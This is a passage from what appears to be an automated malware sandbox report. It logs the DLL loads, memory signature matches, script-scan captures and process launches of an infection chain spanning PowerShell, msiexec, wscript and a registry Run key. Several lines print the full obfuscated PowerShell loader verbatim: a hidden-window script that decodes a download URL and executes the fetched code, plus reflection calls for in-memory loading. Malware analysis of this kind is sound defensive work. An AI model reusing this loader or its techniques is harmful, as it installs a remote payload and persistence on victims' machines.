                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*j[P source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.1669372747.0000000007535000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*tK source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: msiexec.exe, 00000010.00000002.1958810388.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 00000005.00000002.1679189709.000000000A606000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1678908955.0000000008980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1657579338.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Kommenterendes)$GLobaL:paTeNTeRINgeRNES = [sYSTeM.text.enCODIng]::aSCII.GEtStRInG($fALDeRebstrAPpEs)$GLoBaL:eUryAleaN=$patenTERingerneS.subSTRIng($ForVRreLsER,$syNClASTic)<#Trisubsti
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((amorbuer $Formandsposts $Loydie), (Pyrotechny146 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bedeslagenes = [AppDomain]::CurrentDomain.GetAssemblies()$
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Brochering)), $Variotinted119).DefineDynamicModule($Trisaccharose, $false).DefineType($Menusektioners, $Remaker, [System.MulticastDele
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Kommenterendes)$GLobaL:paTeNTeRINgeRNES = [sYSTeM.text.enCODIng]::aSCII.GEtStRInG($fALDeRebstrAPpEs)$GLoBaL:eUryAleaN=$patenTERingerneS.subSTRIng($ForVRreLsER,$syNClASTic)<#Trisubsti
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Met
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887AF09CA push E85E1B5Dh; ret 3_2_00007FF887AF09F9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887AF7962 push ebx; retf 3_2_00007FF887AF796A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
